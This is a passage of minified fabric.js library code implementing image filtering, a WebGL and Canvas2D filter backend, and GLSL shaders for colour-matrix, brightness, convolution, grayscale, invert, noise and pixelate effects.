w=j.util.createCanvasElement(),x=this._filteredEl?this.cacheKey+"_filtered":this.cacheKey,S=D.width,O=D.height;w.width=S,w.height=O,this._element=w,this._lastScaleX=b.scaleX=M,this._lastScaleY=b.scaleY=p,j.filterBackend.applyFilters([b],D,S,O,this._element,x),this._filterScalingX=w.width/this._originalElement.width,this._filterScalingY=w.height/this._originalElement.height},applyFilters:function(b){if(b=(b=b||this.filters||[]).filter(function(D){return D&&!D.isNeutralState()}),this.set("dirty",!0),this.removeTexture(this.cacheKey+"_filtered"),0===b.length)return this._element=this._originalElement,this._filteredEl=null,this._filterScalingX=1,this._filterScalingY=1,this;var _=this._originalElement,y=_.naturalWidth||_.width,M=_.naturalHeight||_.height;if(this._element===this._originalElement){var p=j.util.createCanvasElement();p.width=y,p.height=M,this._element=p,this._filteredEl=p}else this._element=this._filteredEl,this._filteredEl.getContext("2d").clearRect(0,0,y,M),this._lastScaleX=1,this._lastScaleY=1;return j.filterBackend||(j.filterBackend=j.initFilterBackend()),j.filterBackend.applyFilters(b,this._originalElement,y,M,this._element,this.cacheKey),(this._originalElement.width!==this._element.width||this._originalElement.height!==this._element.height)&&(this._filterScalingX=this._element.width/this._originalElement.width,this._filterScalingY=this._element.height/this._originalElement.height),this},_render:function(b){j.util.setImageSmoothing(b,this.imageSmoothing),!0!==this.isMoving&&this.resizeFilter&&this._needsResize()&&this.applyResizeFilters(),this._stroke(b),this._renderPaintInOrder(b)},drawCacheOnCanvas:function(b){j.util.setImageSmoothing(b,this.imageSmoothing),j.Object.prototype.drawCacheOnCanvas.call(this,b)},shouldCache:function(){return this.needsItsOwnCache()},_renderFill:function(b){var _=this._element;if(_){var y=this._filterScalingX,M=this._filterScalingY,p=this.width,D=this.height,w=Math.min,x=Math.max,S=x(this.cropX,0),O=x(this.cropY,0),U=_.naturalWidth||_.width,K=_.naturalHeight||_.height,ee=S*y,se=O*M,ve=w(p*y,U-ee),le=w(D*M,K-se),ye=-p/2,z=-D/2,l=w(p,U/y-S),f=w(D,K/M-O);_&&b.drawImage(_,ee,se,ve,le,ye,z,l,f)}},_needsResize:function(){var b=this.getTotalObjectScaling();return b.scaleX!==this._lastScaleX||b.scaleY!==this._lastScaleY},_resetWidthHeight:function(){this.set(this.getOriginalSize())},_initElement:function(b,_){this.setElement(j.util.getById(b),_),j.util.addClass(this.getElement(),j.Image.CSS_CANVAS)},_initConfig:function(b){b||(b={}),this.setOptions(b),this._setWidthHeight(b)},_initFilters:function(b,_){b&&b.length?j.util.enlivenObjects(b,function(y){_&&_(y)},"fabric.Image.filters"):_&&_()},_setWidthHeight:function(b){b||(b={});var _=this.getElement();this.width=b.width||_.naturalWidth||_.width||0,this.height=b.height||_.naturalHeight||_.height||0},parsePreserveAspectRatioAttribute:function(){var O,b=j.util.parsePreserveAspectRatioAttribute(this.preserveAspectRatio||""),_=this._element.width,y=this._element.height,M=1,p=1,D=0,w=0,x=0,S=0,U=this.width,K=this.height,ee={width:U,height:K};return!b||"none"===b.alignX&&"none"===b.alignY?(M=U/_,p=K/y):("meet"===b.meetOrSlice&&(O=(U-_*(M=p=j.util.findScaleToFit(this._element,ee)))/2,"Min"===b.alignX&&(D=-O),"Max"===b.alignX&&(D=O),O=(K-y*p)/2,"Min"===b.alignY&&(w=-O),"Max"===b.alignY&&(w=O)),"slice"===b.meetOrSlice&&(O=_-U/(M=p=j.util.findScaleToCover(this._element,ee)),"Mid"===b.alignX&&(x=O/2),"Max"===b.alignX&&(x=O),O=y-K/p,"Mid"===b.alignY&&(S=O/2),"Max"===b.alignY&&(S=O),_=U/M,y=K/p)),{width:_,height:y,scaleX:M,scaleY:p,offsetLeft:D,offsetTop:w,cropX:x,cropY:S}}}),j.Image.CSS_CANVAS="canvas-img",j.Image.prototype.getSvgSrc=j.Image.prototype.getSrc,j.Image.fromObject=function(b,_){var y=j.util.object.clone(b);j.util.loadImage(y.src,function(M,p){p?_&&_(null,!0):j.Image.prototype._initFilters.call(y,y.filters,function(D){y.filters=D||[],j.Image.prototype._initFilters.call(y,[y.resizeFilter],function(w){y.resizeFilter=w[0],j.util.enlivenObjectEnlivables(y,y,function(){var x=new j.Image(M,y);_(x,!1)})})})},null,y.crossOrigin)},j.Image.fromURL=function(b,_,y){j.util.loadImage(b,function(M,p){_&&_(new j.Image(M,y),p)},null,y&&y.crossOrigin)},j.Image.ATTRIBUTE_NAMES=j.SHARED_ATTRIBUTES.concat("x y width height preserveAspectRatio xlink:href crossOrigin image-rendering".split(" ")),j.Image.fromElement=function(b,_,y){var M=j.parseAttributes(b,j.Image.ATTRIBUTE_NAMES);j.Image.fromURL(M["xlink:href"],_,g(y?j.util.object.clone(y):{},M))})}(we),j.util.object.extend(j.Object.prototype,{_getAngleValueForStraighten:function(){var E=this.angle%360;return E>0?90*Math.round((E-1)/90):90*Math.round(E/90)},straighten:function(){return this.rotate(this._getAngleValueForStraighten())},fxStraighten:function(E){var g=function(){},b=(E=E||{}).onComplete||g,_=E.onChange||g,y=this;return j.util.animate({target:this,startValue:this.get("angle"),endValue:this._getAngleValueForStraighten(),duration:this.FX_DURATION,onChange:function(M){y.rotate(M),_()},onComplete:function(){y.setCoords(),b()}})}}),j.util.object.extend(j.StaticCanvas.prototype,{straightenObject:function(E){return E.straighten(),this.requestRenderAll(),this},fxStraightenObject:function(E){return E.fxStraighten({onChange:this.requestRenderAllBound})}}),function(){"use strict";function E(b,_){var y="precision "+_+" float;\nvoid main(){}",M=b.createShader(b.FRAGMENT_SHADER);return b.shaderSource(M,y),b.compileShader(M),!!b.getShaderParameter(M,b.COMPILE_STATUS)}function g(b){b&&b.tileSize&&(this.tileSize=b.tileSize),this.setupGLContext(this.tileSize,this.tileSize),this.captureGPUInfo()}j.isWebglSupported=function(b){if(j.isLikelyNode)return!1;b=b||j.WebglFilterBackend.prototype.tileSize;var _=document.createElement("canvas"),y=_.getContext("webgl")||_.getContext("experimental-webgl"),M=!1;if(y){j.maxTextureSize=y.getParameter(y.MAX_TEXTURE_SIZE),M=j.maxTextureSize>=b;for(var p=["highp","mediump","lowp"],D=0;D<3;D++)if(E(y,p[D])){j.webGlPrecision=p[D];break}}return this.isSupported=M,M},j.WebglFilterBackend=g,g.prototype={tileSize:2048,resources:{},setupGLContext:function(b,_){this.dispose(),this.createWebGLCanvas(b,_),this.aPosition=new Float32Array([0,0,0,1,1,0,1,1]),this.chooseFastestCopyGLTo2DMethod(b,_)},chooseFastestCopyGLTo2DMethod:function(b,_){var M,y=void 0!==window.performance;try{new ImageData(1,1),M=!0}catch(ee){M=!1}var p="undefined"!=typeof ArrayBuffer,D="undefined"!=typeof Uint8ClampedArray;if(y&&M&&p&&D){var w=j.util.createCanvasElement(),x=new ArrayBuffer(b*_*4);if(j.forceGLPutImageData)return this.imageBuffer=x,void(this.copyGLTo2D=F);var O,U,S={imageBuffer:x,destinationWidth:b,destinationHeight:_,targetCanvas:w};w.width=b,w.height=_,O=window.performance.now(),Q.call(S,this.gl,S),U=window.performance.now()-O,O=window.performance.now(),F.call(S,this.gl,S),U>window.performance.now()-O?(this.imageBuffer=x,this.copyGLTo2D=F):this.copyGLTo2D=Q}},createWebGLCanvas:function(b,_){var y=j.util.createCanvasElement();y.width=b,y.height=_;var M={alpha:!0,premultipliedAlpha:!1,depth:!1,stencil:!1,antialias:!1},p=y.getContext("webgl",M);p||(p=y.getContext("experimental-webgl",M)),p&&(p.clearColor(0,0,0,0),this.canvas=y,this.gl=p)},applyFilters:function(b,_,y,M,p,D){var x,w=this.gl;D&&(x=this.getCachedTexture(D,_));var S={originalWidth:_.width||_.originalWidth,originalHeight:_.height||_.originalHeight,sourceWidth:y,sourceHeight:M,destinationWidth:y,destinationHeight:M,context:w,sourceTexture:this.createTexture(w,y,M,!x&&_),targetTexture:this.createTexture(w,y,M),originalTexture:x||this.createTexture(w,y,M,!x&&_),passes:b.length,webgl:!0,aPosition:this.aPosition,programCache:this.programCache,pass:0,filterBackend:this,targetCanvas:p},O=w.createFramebuffer();return w.bindFramebuffer(w.FRAMEBUFFER,O),b.forEach(function(U){U&&U.applyTo(S)}),function I(E){var g=E.targetCanvas,y=E.destinationWidth,M=E.destinationHeight;(g.width!==y||g.height!==M)&&(g.width=y,g.height=M)}(S),this.copyGLTo2D(w,S),w.bindTexture(w.TEXTURE_2D,null),w.deleteTexture(S.sourceTexture),w.deleteTexture(S.targetTexture),w.deleteFramebuffer(O),p.getContext("2d").setTransform(1,0,0,1,0,0),S},dispose:function(){this.canvas&&(this.canvas=null,this.gl=null),this.clearWebGLCaches()},clearWebGLCaches:function(){this.programCache={},this.textureCache={}},createTexture:function(b,_,y,M){var p=b.createTexture();return b.bindTexture(b.TEXTURE_2D,p),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_MAG_FILTER,b.NEAREST),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_MIN_FILTER,b.NEAREST),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_WRAP_S,b.CLAMP_TO_EDGE),b.texParameteri(b.TEXTURE_2D,b.TEXTURE_WRAP_T,b.CLAMP_TO_EDGE),M?b.texImage2D(b.TEXTURE_2D,0,b.RGBA,b.RGBA,b.UNSIGNED_BYTE,M):b.texImage2D(b.TEXTURE_2D,0,b.RGBA,_,y,0,b.RGBA,b.UNSIGNED_BYTE,null),p},getCachedTexture:function(b,_){if(this.textureCache[b])return this.textureCache[b];var y=this.createTexture(this.gl,_.width,_.height,_);return this.textureCache[b]=y,y},evictCachesForKey:function(b){this.textureCache[b]&&(this.gl.deleteTexture(this.textureCache[b]),delete this.textureCache[b])},copyGLTo2D:Q,captureGPUInfo:function(){if(this.gpuInfo)return this.gpuInfo;var b=this.gl,_={renderer:"",vendor:""};if(!b)return _;var y=b.getExtension("WEBGL_debug_renderer_info");if(y){var M=b.getParameter(y.UNMASKED_RENDERER_WEBGL),p=b.getParameter(y.UNMASKED_VENDOR_WEBGL);M&&(_.renderer=M.toLowerCase()),p&&(_.vendor=p.toLowerCase())}return this.gpuInfo=_,_}}}(),function(){"use strict";var E=function(){};function g(){}j.Canvas2dFilterBackend=g,g.prototype={evictCachesForKey:E,dispose:E,clearWebGLCaches:E,resources:{},applyFilters:function(b,_,y,M,p){var D=p.getContext("2d");D.drawImage(_,0,0,y,M);var S={sourceWidth:y,sourceHeight:M,imageData:D.getImageData(0,0,y,M),originalEl:_,originalImageData:D.getImageData(0,0,y,M),canvasEl:p,ctx:D,filterBackend:this};return b.forEach(function(O){O.applyTo(S)}),(S.imageData.width!==y||S.imageData.height!==M)&&(p.width=S.imageData.width,p.height=S.imageData.height),D.putImageData(S.imageData,0,0),S}}}(),j.Image=j.Image||{},j.Image.filters=j.Image.filters||{},j.Image.filters.BaseFilter=j.util.createClass({type:"BaseFilter",vertexSource:"attribute vec2 aPosition;\nvarying vec2 vTexCoord;\nvoid main() {\nvTexCoord = aPosition;\ngl_Position = vec4(aPosition * 2.0 - 1.0, 0.0, 1.0);\n}",fragmentSource:"precision highp float;\nvarying vec2 vTexCoord;\nuniform sampler2D uTexture;\nvoid main() {\ngl_FragColor = texture2D(uTexture, vTexCoord);\n}",initialize:function(E){E&&this.setOptions(E)},setOptions:function(E){for(var g in E)this[g]=E[g]},createProgram:function(E,g,b){g=g||this.fragmentSource,b=b||this.vertexSource,"highp"!==j.webGlPrecision&&(g=g.replace(/precision highp float/g,"precision "+j.webGlPrecision+" float"));var _=E.createShader(E.VERTEX_SHADER);if(E.shaderSource(_,b),E.compileShader(_),!E.getShaderParameter(_,E.COMPILE_STATUS))throw new Error("Vertex shader compile error for "+this.type+": "+E.getShaderInfoLog(_));var y=E.createShader(E.FRAGMENT_SHADER);if(E.shaderSource(y,g),E.compileShader(y),!E.getShaderParameter(y,E.COMPILE_STATUS))throw new Error("Fragment shader compile error for "+this.type+": "+E.getShaderInfoLog(y));var M=E.createProgram();if(E.attachShader(M,_),E.attachShader(M,y),E.linkProgram(M),!E.getProgramParameter(M,E.LINK_STATUS))throw new Error('Shader link error for "${this.type}" '+E.getProgramInfoLog(M));var p=this.getAttributeLocations(E,M),D=this.getUniformLocations(E,M)||{};return D.uStepW=E.getUniformLocation(M,"uStepW"),D.uStepH=E.getUniformLocation(M,"uStepH"),{program:M,attributeLocations:p,uniformLocations:D}},getAttributeLocations:function(E,g){return{aPosition:E.getAttribLocation(g,"aPosition")}},getUniformLocations:function(){return{}},sendAttributeData:function(E,g,b){var _=g.aPosition,y=E.createBuffer();E.bindBuffer(E.ARRAY_BUFFER,y),E.enableVertexAttribArray(_),E.vertexAttribPointer(_,2,E.FLOAT,!1,0,0),E.bufferData(E.ARRAY_BUFFER,b,E.STATIC_DRAW)},_setupFrameBuffer:function(E){var b,_,g=E.context;E.passes>1?(_=E.destinationHeight,(E.sourceWidth!==(b=E.destinationWidth)||E.sourceHeight!==_)&&(g.deleteTexture(E.targetTexture),E.targetTexture=E.filterBackend.createTexture(g,b,_)),g.framebufferTexture2D(g.FRAMEBUFFER,g.COLOR_ATTACHMENT0,g.TEXTURE_2D,E.targetTexture,0)):(g.bindFramebuffer(g.FRAMEBUFFER,null),g.finish())},_swapTextures:function(E){E.passes--,E.pass++;var g=E.targetTexture;E.targetTexture=E.sourceTexture,E.sourceTexture=g},isNeutralState:function(){var E=this.mainParameter,g=j.Image.filters[this.type].prototype;if(E){if(Array.isArray(g[E])){for(var b=g[E].length;b--;)if(this[E][b]!==g[E][b])return!1;return!0}return g[E]===this[E]}return!1},applyTo:function(E){E.webgl?(this._setupFrameBuffer(E),this.applyToWebGL(E),this._swapTextures(E)):this.applyTo2d(E)},retrieveShader:function(E){return E.programCache.hasOwnProperty(this.type)||(E.programCache[this.type]=this.createProgram(E.context)),E.programCache[this.type]},applyToWebGL:function(E){var g=E.context,b=this.retrieveShader(E);g.bindTexture(g.TEXTURE_2D,0===E.pass&&E.originalTexture?E.originalTexture:E.sourceTexture),g.useProgram(b.program),this.sendAttributeData(g,b.attributeLocations,E.aPosition),g.uniform1f(b.uniformLocations.uStepW,1/E.sourceWidth),g.uniform1f(b.uniformLocations.uStepH,1/E.sourceHeight),this.sendUniformData(g,b.uniformLocations),g.viewport(0,0,E.destinationWidth,E.destinationHeight),g.drawArrays(g.TRIANGLE_STRIP,0,4)},bindAdditionalTexture:function(E,g,b){E.activeTexture(b),E.bindTexture(E.TEXTURE_2D,g),E.activeTexture(E.TEXTURE0)},unbindAdditionalTexture:function(E,g){E.activeTexture(g),E.bindTexture(E.TEXTURE_2D,null),E.activeTexture(E.TEXTURE0)},getMainParameter:function(){return this[this.mainParameter]},setMainParameter:function(E){this[this.mainParameter]=E},sendUniformData:function(){},createHelpLayer:function(E){if(!E.helpLayer){var g=document.createElement("canvas");g.width=E.sourceWidth,g.height=E.sourceHeight,E.helpLayer=g}},toObject:function(){var E={type:this.type},g=this.mainParameter;return g&&(E[g]=this[g]),E},toJSON:function(){return this.toObject()}}),j.Image.filters.BaseFilter.fromObject=function(E,g){var b=new j.Image.filters[E.type](E);return g&&g(b),b},function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.ColorMatrix=(0,g.util.createClass)(b.BaseFilter,{type:"ColorMatrix",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nvarying vec2 vTexCoord;\nuniform mat4 uColorMatrix;\nuniform vec4 uConstants;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\ncolor *= uColorMatrix;\ncolor += uConstants;\ngl_FragColor = color;\n}",matrix:[1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0],mainParameter:"matrix",colorsOnly:!0,initialize:function(y){this.callSuper("initialize",y),this.matrix=this.matrix.slice(0)},applyTo2d:function(y){var x,S,O,U,K,p=y.imageData.data,D=p.length,w=this.matrix,ee=this.colorsOnly;for(K=0;K<D;K+=4)x=p[K],S=p[K+1],O=p[K+2],ee?(p[K]=x*w[0]+S*w[1]+O*w[2]+255*w[4],p[K+1]=x*w[5]+S*w[6]+O*w[7]+255*w[9],p[K+2]=x*w[10]+S*w[11]+O*w[12]+255*w[14]):(p[K]=x*w[0]+S*w[1]+O*w[2]+(U=p[K+3])*w[3]+255*w[4],p[K+1]=x*w[5]+S*w[6]+O*w[7]+U*w[8]+255*w[9],p[K+2]=x*w[10]+S*w[11]+O*w[12]+U*w[13]+255*w[14],p[K+3]=x*w[15]+S*w[16]+O*w[17]+U*w[18]+255*w[19])},getUniformLocations:function(y,M){return{uColorMatrix:y.getUniformLocation(M,"uColorMatrix"),uConstants:y.getUniformLocation(M,"uConstants")}},sendUniformData:function(y,M){var p=this.matrix,w=[p[4],p[9],p[14],p[19]];y.uniformMatrix4fv(M.uColorMatrix,!1,[p[0],p[1],p[2],p[3],p[5],p[6],p[7],p[8],p[10],p[11],p[12],p[13],p[15],p[16],p[17],p[18]]),y.uniform4fv(M.uConstants,w)}}),g.Image.filters.ColorMatrix.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Brightness=(0,g.util.createClass)(b.BaseFilter,{type:"Brightness",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uBrightness;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\ncolor.rgb += uBrightness;\ngl_FragColor = color;\n}",brightness:0,mainParameter:"brightness",applyTo2d:function(y){if(0!==this.brightness){var D,p=y.imageData.data,w=p.length,x=Math.round(255*this.brightness);for(D=0;D<w;D+=4)p[D]=p[D]+x,p[D+1]=p[D+1]+x,p[D+2]=p[D+2]+x}},getUniformLocations:function(y,M){return{uBrightness:y.getUniformLocation(M,"uBrightness")}},sendUniformData:function(y,M){y.uniform1f(M.uBrightness,this.brightness)}}),g.Image.filters.Brightness.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.Image.filters;_.Convolute=(0,g.util.createClass)(_.BaseFilter,{type:"Convolute",opaque:!1,matrix:[0,0,0,0,1,0,0,0,0],fragmentSource:{Convolute_3_1:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[9];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 0);\nfor (float h = 0.0; h < 3.0; h+=1.0) {\nfor (float w = 0.0; w < 3.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 1), uStepH * (h - 1));\ncolor += texture2D(uTexture, vTexCoord + matrixPos) * uMatrix[int(h * 3.0 + w)];\n}\n}\ngl_FragColor = color;\n}",Convolute_3_0:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[9];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 1);\nfor (float h = 0.0; h < 3.0; h+=1.0) {\nfor (float w = 0.0; w < 3.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 1.0), uStepH * (h - 1.0));\ncolor.rgb += texture2D(uTexture, vTexCoord + matrixPos).rgb * uMatrix[int(h * 3.0 + w)];\n}\n}\nfloat alpha = texture2D(uTexture, vTexCoord).a;\ngl_FragColor = color;\ngl_FragColor.a = alpha;\n}",Convolute_5_1:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[25];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 0);\nfor (float h = 0.0; h < 5.0; h+=1.0) {\nfor (float w = 0.0; w < 5.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 2.0), uStepH * (h - 2.0));\ncolor += texture2D(uTexture, vTexCoord + matrixPos) * uMatrix[int(h * 5.0 + w)];\n}\n}\ngl_FragColor = color;\n}",Convolute_5_0:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[25];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 1);\nfor (float h = 0.0; h < 5.0; h+=1.0) {\nfor (float w = 0.0; w < 5.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 2.0), uStepH * (h - 2.0));\ncolor.rgb += texture2D(uTexture, vTexCoord + matrixPos).rgb * uMatrix[int(h * 5.0 + w)];\n}\n}\nfloat alpha = texture2D(uTexture, vTexCoord).a;\ngl_FragColor = color;\ngl_FragColor.a = alpha;\n}",Convolute_7_1:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[49];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 0);\nfor (float h = 0.0; h < 7.0; h+=1.0) {\nfor (float w = 0.0; w < 7.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 3.0), uStepH * (h - 3.0));\ncolor += texture2D(uTexture, vTexCoord + matrixPos) * uMatrix[int(h * 7.0 + w)];\n}\n}\ngl_FragColor = color;\n}",Convolute_7_0:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[49];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 1);\nfor (float h = 0.0; h < 7.0; h+=1.0) {\nfor (float w = 0.0; w < 7.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 3.0), uStepH * (h - 3.0));\ncolor.rgb += texture2D(uTexture, vTexCoord + matrixPos).rgb * uMatrix[int(h * 7.0 + w)];\n}\n}\nfloat alpha = texture2D(uTexture, vTexCoord).a;\ngl_FragColor = color;\ngl_FragColor.a = alpha;\n}",Convolute_9_1:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[81];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 0);\nfor (float h = 0.0; h < 9.0; h+=1.0) {\nfor (float w = 0.0; w < 9.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 4.0), uStepH * (h - 4.0));\ncolor += texture2D(uTexture, vTexCoord + matrixPos) * uMatrix[int(h * 9.0 + w)];\n}\n}\ngl_FragColor = color;\n}",Convolute_9_0:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uMatrix[81];\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = vec4(0, 0, 0, 1);\nfor (float h = 0.0; h < 9.0; h+=1.0) {\nfor (float w = 0.0; w < 9.0; w+=1.0) {\nvec2 matrixPos = vec2(uStepW * (w - 4.0), uStepH * (h - 4.0));\ncolor.rgb += texture2D(uTexture, vTexCoord + matrixPos).rgb * uMatrix[int(h * 9.0 + w)];\n}\n}\nfloat alpha = texture2D(uTexture, vTexCoord).a;\ngl_FragColor = color;\ngl_FragColor.a = alpha;\n}"},retrieveShader:function(M){var p=Math.sqrt(this.matrix.length),D=this.type+"_"+p+"_"+(this.opaque?1:0),w=this.fragmentSource[D];return M.programCache.hasOwnProperty(D)||(M.programCache[D]=this.createProgram(M.context,w)),M.programCache[D]},applyTo2d:function(M){var ve,le,ye,z,l,f,A,v,P,G,X,L,h,p=M.imageData,D=p.data,w=this.matrix,x=Math.round(Math.sqrt(w.length)),S=Math.floor(x/2),O=p.width,U=p.height,K=M.ctx.createImageData(O,U),ee=K.data,se=this.opaque?1:0;for(X=0;X<U;X++)for(G=0;G<O;G++){for(l=4*(X*O+G),ve=0,le=0,ye=0,z=0,h=0;h<x;h++)for(L=0;L<x;L++)f=G+L-S,!((A=X+h-S)<0||A>=U||f<0||f>=O)&&(ve+=D[v=4*(A*O+f)]*(P=w[h*x+L]),le+=D[v+1]*P,ye+=D[v+2]*P,se||(z+=D[v+3]*P));ee[l]=ve,ee[l+1]=le,ee[l+2]=ye,ee[l+3]=se?D[l+3]:z}M.imageData=K},getUniformLocations:function(M,p){return{uMatrix:M.getUniformLocation(p,"uMatrix"),uOpaque:M.getUniformLocation(p,"uOpaque"),uHalfSize:M.getUniformLocation(p,"uHalfSize"),uSize:M.getUniformLocation(p,"uSize")}},sendUniformData:function(M,p){M.uniform1fv(p.uMatrix,this.matrix)},toObject:function(){return b(this.callSuper("toObject"),{opaque:this.opaque,matrix:this.matrix})}}),g.Image.filters.Convolute.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Grayscale=(0,g.util.createClass)(b.BaseFilter,{type:"Grayscale",fragmentSource:{average:"precision highp float;\nuniform sampler2D uTexture;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nfloat average = (color.r + color.b + color.g) / 3.0;\ngl_FragColor = vec4(average, average, average, color.a);\n}",lightness:"precision highp float;\nuniform sampler2D uTexture;\nuniform int uMode;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 col = texture2D(uTexture, vTexCoord);\nfloat average = (max(max(col.r, col.g),col.b) + min(min(col.r, col.g),col.b)) / 2.0;\ngl_FragColor = vec4(average, average, average, col.a);\n}",luminosity:"precision highp float;\nuniform sampler2D uTexture;\nuniform int uMode;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 col = texture2D(uTexture, vTexCoord);\nfloat average = 0.21 * col.r + 0.72 * col.g + 0.07 * col.b;\ngl_FragColor = vec4(average, average, average, col.a);\n}"},mode:"average",mainParameter:"mode",applyTo2d:function(y){var D,x,p=y.imageData.data,w=p.length,S=this.mode;for(D=0;D<w;D+=4)"average"===S?x=(p[D]+p[D+1]+p[D+2])/3:"lightness"===S?x=(Math.min(p[D],p[D+1],p[D+2])+Math.max(p[D],p[D+1],p[D+2]))/2:"luminosity"===S&&(x=.21*p[D]+.72*p[D+1]+.07*p[D+2]),p[D]=x,p[D+1]=x,p[D+2]=x},retrieveShader:function(y){var M=this.type+"_"+this.mode;return y.programCache.hasOwnProperty(M)||(y.programCache[M]=this.createProgram(y.context,this.fragmentSource[this.mode])),y.programCache[M]},getUniformLocations:function(y,M){return{uMode:y.getUniformLocation(M,"uMode")}},sendUniformData:function(y,M){y.uniform1i(M.uMode,1)},isNeutralState:function(){return!1}}),g.Image.filters.Grayscale.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Invert=(0,g.util.createClass)(b.BaseFilter,{type:"Invert",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform int uInvert;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nif (uInvert == 1) {\ngl_FragColor = vec4(1.0 - color.r,1.0 -color.g,1.0 -color.b,color.a);\n} else {\ngl_FragColor = color;\n}\n}",invert:!0,mainParameter:"invert",applyTo2d:function(y){var D,p=y.imageData.data,w=p.length;for(D=0;D<w;D+=4)p[D]=255-p[D],p[D+1]=255-p[D+1],p[D+2]=255-p[D+2]},isNeutralState:function(){return!this.invert},getUniformLocations:function(y,M){return{uInvert:y.getUniformLocation(M,"uInvert")}},sendUniformData:function(y,M){y.uniform1i(M.uInvert,this.invert)}}),g.Image.filters.Invert.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.Image.filters;_.Noise=(0,g.util.createClass)(_.BaseFilter,{type:"Noise",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uStepH;\nuniform float uNoise;\nuniform float uSeed;\nvarying vec2 vTexCoord;\nfloat rand(vec2 co, float seed, float vScale) {\nreturn fract(sin(dot(co.xy * vScale ,vec2(12.9898 , 78.233))) * 43758.5453 * (seed + 0.01) / 2.0);\n}\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\ncolor.rgb += (0.5 - rand(vTexCoord, uSeed, 0.1 / uStepH)) * uNoise;\ngl_FragColor = color;\n}",mainParameter:"noise",noise:0,applyTo2d:function(M){if(0!==this.noise){var w,x,O,D=M.imageData.data,S=this.noise;for(w=0,x=D.length;w<x;w+=4)O=(.5-Math.random())*S,D[w]+=O,D[w+1]+=O,D[w+2]+=O}},getUniformLocations:function(M,p){return{uNoise:M.getUniformLocation(p,"uNoise"),uSeed:M.getUniformLocation(p,"uSeed")}},sendUniformData:function(M,p){M.uniform1f(p.uNoise,this.noise/255),M.uniform1f(p.uSeed,Math.random())},toObject:function(){return b(this.callSuper("toObject"),{noise:this.noise})}}),g.Image.filters.Noise.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Pixelate=(0,g.util.createClass)(b.BaseFilter,{type:"Pixelate",blocksize:4,mainParameter:"blocksize",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uBlocksize;\nuniform float uStepW;\nuniform float uStepH;\nvarying vec2 vTexCoord;\nvoid main() {\nfloat blockW = uBlocksize * uStepW;\nfloat blockH = uBlocksize * uStepW;\nint posX = int(vTexCoord.x / blockW);\nint posY = int(vTexCoord.y / blockH);\nfloat fposX = float(posX);\nfloat fposY = float(posY);\nvec2 squareCoords = vec2(fposX * blockW, fposY * blockH);\nvec4 color = texture2D(uTexture, squareCoords);\ngl_FragColor = color;\n}",applyTo2d:function(y){var 